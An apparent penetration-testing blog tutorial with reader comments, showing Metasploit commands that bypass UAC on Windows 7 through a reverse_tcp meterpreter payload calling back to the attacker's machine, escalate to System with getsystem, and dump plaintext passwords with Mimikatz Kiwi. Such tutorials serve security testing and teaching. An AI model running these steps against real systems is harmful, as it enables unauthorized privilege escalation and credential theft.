System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

BypassUAC Metasploit 1

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from one used for original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

BypassUAC Metasploit 2

Now if we type “getsystem” it should work, as verified by “getuid”:

BypassUAC Metasploit 3

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi“:

BypassUAC Mimikatz 4

Then type, “creds_all“:

BypassUAC Mimikatz 5

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Lastly, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!


4 thoughts on “System level Access and Plain Text Passwords using Bypass UAC and Mimikatz”

  1. Hi, I was trying out this method for my lab , but its showing the following error after i run exploit :

    msf exploit(bypassuac) > exploit

    [*] Started reverse handler on
    [*] UAC is Enabled, checking level…
    [+] UAC is set to Default
    [+] BypassUAC can bypass this setting, continuing…
    [+] Part of Administrators group! Continuing…
    [*] Uploaded the agent to the filesystem….
    [*] Uploading the bypass UAC executable to the filesystem…
    [*] Meterpreter stager executable 73802 bytes long being uploaded..
    [-] Exploit failed [timeout-expired]: Timeout::Error execution expired
    msf exploit(bypassuac) >

    Can you suggest some solution for this error, I would really appreciate it.

    1. Are you using the latest updates? I used this on 32 bit, if you are using 64 you need to “show targets” and set it to 64 and use the 64 bit reverse TCP module. Other than that the only thing I can think of is that AV could be blocking it. But it is working here on 32 and 64 bit updated demo systems with AV.

      1. Hi, I am using it for 32 bit system, and i have made sure no anit-virus is installed on the system…I googled the error output but its not showing any useful solution!!
        If u can suggest some workaround, i would really appreciate it.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: